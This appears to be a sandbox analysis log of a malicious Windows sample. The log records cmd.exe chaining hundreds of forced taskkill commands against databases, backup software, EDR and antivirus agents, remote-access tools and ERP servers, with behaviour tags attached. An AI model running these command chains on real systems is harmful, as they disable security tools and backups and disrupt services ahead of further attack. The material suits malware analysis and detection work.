C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"4⤵
- System Time Discovery
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rcrelay.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SogouImeBroker.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CCenter.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFrm.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM d_manage.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RsTray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wampmanager.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RavTray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mssearch.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlmangr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msftesql.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseSvr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseConsole.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aspnet_state.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoBackUpEx.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM redis-server.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MySQLNotifier.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oravssw.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fppdis5.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM His6Service.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM dinotify.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM JhTask.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Executer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AllPassCBHost.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ap_nginx.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AndroidServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XT.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XTService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AllPassMCService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IMEDICTUPDATE.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM FlashHelperService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ap_redis-server.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UtilDev.WebServer.Monitor.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UWS.AppHost.Clr2.x86.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM FoxitProtect.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ftnlses.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ftusbrdwks.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ftusbrdsrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ftnlsv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Syslogd_Service.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UWS.HighPrivilegeUtilities.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ftusbsrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UWS.LowPrivilegeUtilities.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM winguard_x64.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vmconnect.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UWS.AppHost.Clr2.x86.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM firefox.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM usbrdsrv.exe /F5⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExec.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Att.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mdm.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExecManagementService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bengine.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM benetns.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beserver.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pvlsvr.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bedbg.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RemoteAssistProcess.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarMoniService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGameSrv.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarCMService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsService.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGame.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServerView.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IcafeServicesTray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BsAgent_0.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ControlServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DisklessServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DumpServer.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM NetDiskServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PersonUDisk.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM service_agent.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SoftMemory.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RtkNGUI64.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Serv-U-Tray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QQPCSoftTrayTips.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SohuNews.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Serv-U.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QQPCRTP.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM EasyFZS.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HaoYiShi.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM HysMySQL.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wtautoreg.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ispiritPro.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CAService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XAssistant.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TrustCA.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GEUU20003.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CertMgr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSafe_monitor.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MainExecute.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM FastInvoice.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SoftMgrLite.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sesvc.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFileServer.exe /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T & whoami"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSDS.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mysqld.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer_Service.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TeamViewer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CasLicenceServer.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_w32.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM tv_x64.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rdm.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRT.exe /F5⤵
-
-
